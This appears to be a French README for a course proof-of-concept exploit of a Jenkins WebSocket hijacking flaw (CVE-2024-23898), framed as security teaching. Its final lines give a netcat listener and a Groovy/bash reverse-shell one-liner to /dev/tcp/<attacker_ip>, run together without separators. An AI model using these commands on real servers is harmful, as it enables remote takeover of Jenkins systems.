
Un exploit de détournement de WebSocket intersite (cross-site WebSocket hijacking) de type preuve de concept pour CVE-2024-23898 — une vulnérabilité affectant Jenkins versions 2.217 à 2.441. À des fins éducatives dans le cours Hacking & Offensive Security à l'université Carnegie Mellon.
Un exploit de preuve de concept de détournement WebSocket cross-site pour CVE-2024-23898 — une vulnérabilité affectant les versions de Jenkins 2.217-2.441.
Cet exploit cible le CLI Jenkins qui peut être utilisé pour accéder à distance et exécuter des commandes sur un serveur de contrôle Jenkins. Grâce à cet exploit, un attaquant distant peut obtenir un accès et établir une porte dérobée persistante sur un serveur de contrôle Jenkins si un administrateur est amené à visiter un site malveillant alors qu'il est connecté au serveur de contrôle Jenkins cible.
Ce code est destiné uniquement à des fins éducatives et exclusivement pour le cours de Hacking & Offensive Security de l'Université Carnegie Mellon. Ce code ne doit pas être transformé en arme ou autrement utilisé pour créer des logiciels malveillants. Les auteurs condamnent explicitement toute tentative en ce sens.
nc -l <port_num> (remplacez <port_num> par tout numéro de port inutilisé)ipconfig getifaddr en0[http://localhost:8080/script](http://localhost:8080/script). Connectez-vous avec le compte administrateur si ce n'est pas déjà fait.['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()